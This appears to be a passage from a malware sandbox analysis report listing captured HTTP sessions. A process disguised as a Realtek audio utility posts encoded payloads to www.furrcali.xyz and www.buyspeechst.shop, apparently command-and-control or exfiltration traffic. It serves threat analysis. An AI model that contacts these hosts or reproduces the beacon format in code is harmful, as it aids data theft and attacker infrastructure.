                                                                          Data Raw: 6c 56 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 31 75 48 2f 38 50 70 72 50 6b 36 49 7a 6c 42 37 32 78 71 35 53 7a 70 78 31 6b 42 31 4e 75 58 58 52 42 49 7a 78 64 52 31 38 77 6d 67 6a 57 45 48 75 36 4d 73 4f 5a 43 39 6c 41 34 5a 67 56 39 56 31 58 6f 36 52 54 36 54 54 2f 58 51 5a 43 4d 62 2b 2b 41 71 67 50 4e 59 30 75 76 41 41 6f 65 52 75 54 4c 63 50 54 2b 38 61 77 44 4f 63 52 78 59 69 6d 44 54 47 43 6d 77 4a 4e 79 52 53 6a 45 6b 36 78 4f 66 35 44 73 72 6e 6e 79 6a 75 59 4d 36 6f 36 7a 6e 38 78 33 43 4d 4d 30 33 58 34 39 61 59 69 78 4a 68 52 66 70 71 2f 6f 4e 75 4b 56 74 69 50 65 2f 51 3d 3d
                                                                          Data Ascii: lV=rJkYOGdVVG3na1uH/8PprPk6IzlB72xq5Szpx1kB1NuXXRBIzxdR18wmgjWEHu6MsOZC9lA4ZgV9V1Xo6RT6TT/XQZCMb++AqgPNY0uvAAoeRuTLcPT+8awDOcRxYimDTGCmwJNyRSjEk6xOf5DsrnnyjuYM6o6zn8x3CMM03X49aYixJhRfpq/oNuKVtiPe/Q==
                                                                          Jan 9, 2025 16:50:25.749278069 CET242INHTTP/1.1 302 Found
                                                                          Location: https://www.furrcali.xyz/k29t/
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:25 GMT
                                                                          Content-Length: 0
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.11.2049787103.106.67.112807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:28.198297024 CET815OUTPOST /k29t/ HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.furrcali.xyz
                                                                          Referer: http://www.furrcali.xyz/k29t/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 57 58 58 77 78 49 79 77 64 52 67 38 77 6d 30 7a 58 76 59 2b 36 44 73 4f 56 6b 39 6c 4d 34 5a 67 78 39 56 30 6e 6f 36 69 37 35 51 6a 2f 52 64 35 43 4f 52 65 2b 41 71 67 50 4e 59 30 36 46 41 41 41 65 53 64 37 4c 66 75 54 39 32 36 77 41 48 38 52 78 4b 53 6d 50 54 47 43 59 77 4e 46 63 52 51 72 45 6b 2b 31 4f 66 73 2f 72 77 33 6e 6f 74 4f 5a 6a 2f 70 71 35 6f 49 42 6b 53 64 73 2f 76 32 77 31 66 4f 76 72 55 54 6c 37 71 35 6a 61 4a 65 7a 39 76 67 4f 46 69 56 73 42 34 7a 62 38 57 7a 38 78 6f 36 58 78 63 6a 47 69 4b 5a 6b 3d
                                                                          Data Ascii: lV=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17WXXwxIywdRg8wm0zXvY+6DsOVk9lM4Zgx9V0no6i75Qj/Rd5CORe+AqgPNY06FAAAeSd7LfuT926wAH8RxKSmPTGCYwNFcRQrEk+1Ofs/rw3notOZj/pq5oIBkSds/v2w1fOvrUTl7q5jaJez9vgOFiVsB4zb8Wz8xo6XxcjGiKZk=
                                                                          Jan 9, 2025 16:50:28.452150106 CET242INHTTP/1.1 302 Found
                                                                          Location: https://www.furrcali.xyz/k29t/
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:28 GMT
                                                                          Content-Length: 0
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.11.2049788103.106.67.112807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:30.896866083 CET2578OUTPOST /k29t/ HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.furrcali.xyz
                                                                          Referer: http://www.furrcali.xyz/k29t/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 65 58 57 47 46 49 79 58 4a 52 6d 4d 77 6d 33 7a 57 49 59 2b 36 61 73 4b 35 67 39 6c 52 4e 5a 69 35 39 55 57 76 6f 72 6a 37 35 48 54 2f 52 42 4a 43 4c 62 2b 2b 52 71 6b 54 42 59 30 71 46 41 41 41 65 53 62 48 4c 4a 50 54 39 77 36 77 44 4f 63 52 39 59 69 6d 72 54 47 61 58 77 4e 42 69 57 68 4c 45 6c 61 52 4f 64 65 58 72 74 6e 6e 75 75 4f 5a 37 2f 70 6e 6a 6f 4f 6c 43 53 65 78 6f 76 33 34 31 65 35 71 4e 4f 54 74 5a 75 36 62 36 4e 63 4c 2f 6e 44 6a 52 6d 32 70 34 33 43 62 46 57 6e 68 70 71 71 44 73 49 79 4b 33 64 73 36 4f 30 71 4c 4c 56 57 77 59 32 31 2f 75 6e 46 6c 68 48 75 36 31 61 4f 75 7a 76 59 39 42 77 51 72 78 67 30 59 74 7a 37 55 69 65 77 5a 50 53 63 47 52 44 76 6d 72 57 45 5a 48 78 50 41 52 68 33 58 65 74 53 43 53 53 5a 72 33 53 74 49 4d 56 4a 68 6b 54 31 47 66 36 7a 52 59 54 46 6e 4c 38 45 37 4c 4b 38 36 6f 77 58 67 74 54 44 45 51 4b 56 6b 4b 69 7a 77 54 71 37 4e [TRUNCATED]
                                                                          Data Ascii: lV=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17eXWGFIyXJRmMwm3zWIY+6asK5g9lRNZi59UWvorj75HT/RBJCLb++RqkTBY0qFAAAeSbHLJPT9w6wDOcR9YimrTGaXwNBiWhLElaROdeXrtnnuuOZ7/pnjoOlCSexov341e5qNOTtZu6b6NcL/nDjRm2p43CbFWnhpqqDsIyK3ds6O0qLLVWwY21/unFlhHu61aOuzvY9BwQrxg0Ytz7UiewZPScGRDvmrWEZHxPARh3XetSCSSZr3StIMVJhkT1Gf6zRYTFnL8E7LK86owXgtTDEQKVkKizwTq7NZbRHCUzrnu+BWtetApAfc91IfP5OGSp5I8uSfn6ky/495HTT6wNL1jLedJw7xtP8iMsRdpU14c2UNJpNQu9uqiApObEjz9Ga+t7JInw21qjAHj2LMDR8dU+DheFMQXR/muK9VvdKoaQ5dioH8JHAF5YiGYUSs+eZjiYT+ZpKcFOk3CD+JLvkSZzVSGgmGzoKLsiY3BPG5HJxaH8nAWoxzD8wt1FSi67uNhG02ehyCHO/R39natKTcdY/9A4SIAbUbg1u8qJE37tfMzBFiGa3Aw8gmeQgY9IALojq+WeQ0hJBOZOiiGWSJqzTSTQw6zTmNOEc6Elqd3fnj/LfWqPvJ0L7nMoWiN5u+z2pus4g66LD0JYyczlVOC64Lm4qoRuewE2etYlfqTuEKHpnOSPBGd6kDN5kMqNwufp2D0fhYWw04MF7V50QLPKD7wguPRftVLBspsIY+wZHBtZnobDPoWtIpCIR6CzPUd5mNmJlW7dE+Hop5SE+I+TXrQKy/S6jUjo2oVCEM1I86a9aO9IK4XhI/3vVSEuPCS/d2SMte6bOAwkmb9gDTevMVCtZsBwYS1pjVmKhKT/1INHCoij5xg/QZsPDif3dBVtblNWU7cGZN3IEfrDgbXioFhW5zGijcj9V4iifg3sk1OEVQWN9D+Jmq0s9Ef+gVn [TRUNCATED]
                                                                          Jan 9, 2025 16:50:30.896893978 CET5156OUTData Raw: 44 53 55 6b 30 52 77 44 4b 67 69 39 73 47 69 30 59 43 50 74 56 7a 69 6e 37 46 47 38 4d 47 6c 34 65 37 31 45 52 41 31 50 34 46 44 4d 64 36 56 79 73 6f 51 61 56 73 43 70 4b 31 6a 79 32 54 73 65 4d 4c 7a 46 61 53 71 67 6f 5a 32 70 53 53 37 6a 59 6d
                                                                          Data Ascii: DSUk0RwDKgi9sGi0YCPtVzin7FG8MGl4e71ERA1P4FDMd6VysoQaVsCpK1jy2TseMLzFaSqgoZ2pSS7jYmA1Ij0VYvip0IOro1HMYmtydfeFdTSRdnpZt3SsbsKXhtGhDcPpwR3UdZ/a8kp99rbUiGdLZw0VyUChxPPoEtPk6TaHAQvskgiViXCHXZsTD2ZtJYx256Nk7fiQmQxKjxQzALWslC6d9DIGInqL1NEQsC0+Bi3Hccb
                                                                          Jan 9, 2025 16:50:30.896965027 CET230OUTData Raw: 71 36 72 4d 37 79 44 52 6d 55 33 51 73 74 41 31 43 6f 39 46 54 50 66 4f 31 51 70 57 36 78 57 32 37 38 69 4e 70 33 78 72 52 2f 4b 78 4e 49 62 41 4b 5a 59 57 35 6e 45 39 66 70 4d 6d 41 54 73 37 59 37 32 4c 52 2b 33 31 33 43 4a 38 6b 5a 33 59 30 73
                                                                          Data Ascii: q6rM7yDRmU3QstA1Co9FTPfO1QpW6xW278iNp3xrR/KxNIbAKZYW5nE9fpMmATs7Y72LR+313CJ8kZ3Y0s+axeIo1RBFGaR9YP1lSIDfK3OK6qsgwTOL8Nwsw8KKQNzijACou7hM8cnRaPDcJL69xKbl1ThH2vlJEE4y6xDxBGAweUWYHIM7vO7FANMPTDfqPWAUE7Ek3taaHuo4Scke/37sMXHYrxCb9xFA==
                                                                          Jan 9, 2025 16:50:31.150913000 CET242INHTTP/1.1 302 Found
                                                                          Location: https://www.furrcali.xyz/k29t/
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:31 GMT
                                                                          Content-Length: 0
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.11.2049789103.106.67.112807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:33.601604939 CET530OUTGET /k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:33.855196953 CET619INHTTP/1.1 302 Found
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Location: https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBw
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:33 GMT
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 75 72 72 63 61 6c 69 2e 78 79 7a 2f 6b 32 39 74 2f 3f 6c 56 3d 6d 4c 4d 34 4e 79 56 33 52 6d 37 4c 53 46 36 32 7a 71 33 71 70 73 73 73 42 31 46 37 6a 55 6b 66 6c 43 2f 63 77 58 39 58 78 39 65 44 51 42 4a 37 2f 67 4e 74 35 39 63 75 6a 67 4c 57 47 65 79 67 70 64 73 48 75 48 51 36 5a 54 31 6e 5a 45 65 45 36 41 7a 71 50 44 44 4d 52 6f 36 58 47 70 75 44 31 58 48 69 61 56 36 78 4f 6a 31 69 4a 2b 2f 30 5a 39 6a 54 34 59 67 3d 26 61 6d 70 3b 4c 53 62 61 54 3d 7a 66 74 34 4c 6f 42 77 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                          Data Ascii: <a href="https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&amp;LSbaT=zft4LoBw">Found</a>.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.11.2049790104.21.112.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:39.149307966 CET807OUTPOST /w98i/ HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.buyspeechst.shop
                                                                          Referer: http://www.buyspeechst.shop/w98i/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 72 52 6d 59 52 45 66 59 6a 55 34 4b 30 33 6e 2f 39 76 62 66 43 6a 35 71 49 6a 4b 6c 4f 46 31 62 7a 75 55 74 67 39 42 7a 7a 46 6b 30 49 7a 48 6b 6b 4f 45 4e 4d 70 2f 31 37 4b 58 4f 42 35 69 65 52 35 51 52 43 32 4a 75 6e 75 37 6e 4c 6f 37 50 67 66 38 64 38 30 73 79 6e 72 61 52 65 2f 49 67 47 64 6b 67 75 57 4c 38 38 71 57 62 70 31 56 4a 70 62 6d 43 43 75 6c 58 6d 6f 6e 48 68 41 63 49 51 53 30 74 32 42 4a 4f 77 6a 56 74 43 50 72 6b 4d 35 64 4a 36 37 4a 2f 2f 74 77 30 39 58 63 72 54 7a 2b 75 34 47 2f 36 63 6e 46 68 43 36 33 38 6c 6d 70 77 77 3d 3d
                                                                          Data Ascii: lV=ZdYnZ6+WLY4YYrRmYREfYjU4K03n/9vbfCj5qIjKlOF1bzuUtg9BzzFk0IzHkkOENMp/17KXOB5ieR5QRC2Junu7nLo7Pgf8d80synraRe/IgGdkguWL88qWbp1VJpbmCCulXmonHhAcIQS0t2BJOwjVtCPrkM5dJ67J//tw09XcrTz+u4G/6cnFhC638lmpww==
                                                                          Jan 9, 2025 16:50:39.402750969 CET1059INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:39 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLueVAdh4mizLzPAFxBT5pY2ssW1VIRipybrEwS3KbMuzsL0rMcio9kLSdR0zZZ6dDJqEkQM9%2BUn8SG3zWxrtgb7uauMp3IM08CIPKkzQnBduXHQxsgvG3vsLyIMFdIq%2Bl8FCD0L1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5958f1c0ff865-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118739&min_rtt=118739&rtt_var=59369&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a
                                                                          Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+
                                                                          Jan 9, 2025 16:50:39.402765989 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.11.2049791104.21.112.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:41.797319889 CET827OUTPOST /w98i/ HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.buyspeechst.shop
                                                                          Referer: http://www.buyspeechst.shop/w98i/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 64 31 43 54 65 55 75 6c 4a 42 32 7a 46 6b 6e 49 7a 43 67 6b 4f 54 4e 4d 6b 4b 31 2b 69 58 4f 42 39 69 65 51 4a 51 52 31 61 47 6f 6e 75 35 2f 37 6f 35 4c 67 66 38 64 38 30 73 79 6e 2f 30 52 65 6e 49 68 32 74 6b 69 4c 71 45 6e 63 71 5a 52 4a 31 56 44 4a 62 69 43 43 75 58 58 6b 63 42 48 69 34 63 49 55 43 30 73 6e 42 57 45 77 6a 54 67 69 4f 2b 33 4d 55 57 51 71 66 32 2f 66 34 73 31 4d 66 41 6a 6c 2b 6b 7a 4b 79 62 35 50 37 33 6c 79 44 66 2b 6e 6e 79 74 2b 76 34 57 36 32 32 52 4e 4a 4b 6e 52 33 4a 6c 52 30 57 46 31 73 3d
                                                                          Data Ascii: lV=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4d1CTeUulJB2zFknIzCgkOTNMkK1+iXOB9ieQJQR1aGonu5/7o5Lgf8d80syn/0RenIh2tkiLqEncqZRJ1VDJbiCCuXXkcBHi4cIUC0snBWEwjTgiO+3MUWQqf2/f4s1MfAjl+kzKyb5P73lyDf+nnyt+v4W622RNJKnR3JlR0WF1s=
                                                                          Jan 9, 2025 16:50:42.056384087 CET1069INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:42 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctFN4TaJT%2B0gJxpkFJebArmioPfFs2kHe842w64H%2FYlPqDB3UplOHDxdGyq%2B1DrDhV9YDYEmtIdJI29EP51XDNFjRx25%2FbcSJLsir89tZq7Ql%2Fg6bq%2BjIqWFBG%2FVEYS4xQjm3AGnPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5959faff5eaf7-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=128251&min_rtt=128251&rtt_var=64125&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=827&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a
                                                                          Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+
                                                                          Jan 9, 2025 16:50:42.056399107 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.11.2049792104.21.112.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:44.451785088 CET2578OUTPOST /w98i/ HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.buyspeechst.shop
                                                                          Referer: http://www.buyspeechst.shop/w98i/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 56 31 65 77 57 55 73 43 56 42 31 7a 46 6b 38 6f 7a 44 67 6b 50 52 4e 4d 73 52 31 2b 6e 69 4f 44 31 69 4d 6a 52 51 41 52 4f 47 37 48 75 35 6a 4c 6f 38 50 67 66 70 64 36 55 6f 79 6e 76 30 52 65 6e 49 68 30 46 6b 6c 65 57 45 6c 63 71 57 62 70 31 4a 4a 70 61 39 43 47 4b 74 58 6b 49 52 41 54 59 63 4a 30 53 30 75 52 31 57 48 51 6a 52 6c 69 50 39 33 4d 59 5a 51 71 54 63 2f 66 4e 37 31 4e 58 41 6e 44 72 50 69 34 2b 35 73 4f 4c 4a 36 32 54 43 31 6c 2f 43 71 63 66 62 66 4d 32 48 5a 63 39 4e 73 6a 4c 6e 67 7a 67 4b 45 6c 63 61 4a 2f 63 6d 6e 4b 6d 6c 61 7a 48 58 66 58 4f 45 55 45 44 76 6f 62 4c 51 75 45 2b 61 38 2f 59 36 36 4e 69 76 71 65 63 37 52 53 7a 64 33 78 6d 75 7a 6e 47 48 78 56 64 77 31 54 45 41 4e 74 71 4f 36 76 62 58 4b 38 72 64 58 53 72 52 51 4c 78 52 78 7a 51 48 2b 7a 32 72 6b 4e 6e 51 53 42 71 6f 51 68 36 65 51 43 2b 42 43 36 33 76 32 67 78 72 68 55 47 38 39 6d 4f [TRUNCATED]
                                                                          Data Ascii: lV=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4V1ewWUsCVB1zFk8ozDgkPRNMsR1+niOD1iMjRQAROG7Hu5jLo8Pgfpd6Uoynv0RenIh0FkleWElcqWbp1JJpa9CGKtXkIRATYcJ0S0uR1WHQjRliP93MYZQqTc/fN71NXAnDrPi4+5sOLJ62TC1l/CqcfbfM2HZc9NsjLngzgKElcaJ/cmnKmlazHXfXOEUEDvobLQuE+a8/Y66Nivqec7RSzd3xmuznGHxVdw1TEANtqO6vbXK8rdXSrRQLxRxzQH+z2rkNnQSBqoQh6eQC+BC63v2gxrhUG89mO33vCZGbDm22twbE0JwLM14pTTNS/E+rSLCPkSHZ35AsArdJlVOvJuZzqVBrQAfmuWlYOdWYCIRsKuqE8v1tat35UTBYrWf8MNgX5MlgnPG3PX7MFRHr7LBbVcuFDAJCGylAdHnhlCoJ6Ou8crU2PZihIzU4eFyUEx5EAVSQ5dalFrLO2oxRDJvaF3a5oBdF+e5Mq3SaHT2g9wYcyQArCSkOS+s5qygRJghOlZjR3n+WSgBr0hsrQIyq/Ua1i4lntQoqJDyUKoHWU9wCzoR2NXKSPnV3XK/eFxVpPN90Hp9hyxbW4ncdUtFAuS3qlB+RQMz1bys8gVfazOHZNzjfwGS2geZRqpgmnTvwK9El6KxOOiZ+13earDNuCC9IzkyxquA3YnhAs51ofJu3cwS4G4NEqmn8o3wwQIkQSahTcSspb6jow4kZ8LZqKtYDTKpx6wKlsV/wM3PkHGgb41gl5mkHJDShfvN/JMi4iuOAPE/4zEQt/x2ZuOr7lP/3geRoUSv+RVWA/gKjc3pStnif+vn+7jAhZKq3qCaStkmF09+LD0grMEPrj3gKij3BQKqLDAhHmSb09G/QsxBKLoh3qpL49Qzn3N55z1CkP93LIiIo9vVZgHX/1wpDwB4onCpWtfLTFiJ+DlrWceI+wgnVgJMnhiAPG4UofHR [TRUNCATED]
                                                                          Jan 9, 2025 16:50:44.451836109 CET5398OUTData Raw: 37 6f 79 54 78 39 6b 63 75 69 53 4e 63 6f 41 64 35 2b 50 5a 4e 78 7a 30 34 33 62 71 74 36 66 66 53 77 34 43 54 4e 48 4d 62 7a 45 59 4d 6b 41 49 65 2b 6e 36 49 43 68 48 63 54 4f 79 6f 2f 64 69 56 37 77 6f 34 6a 4c 6f 31 43 45 63 30 6a 74 79 4c 31
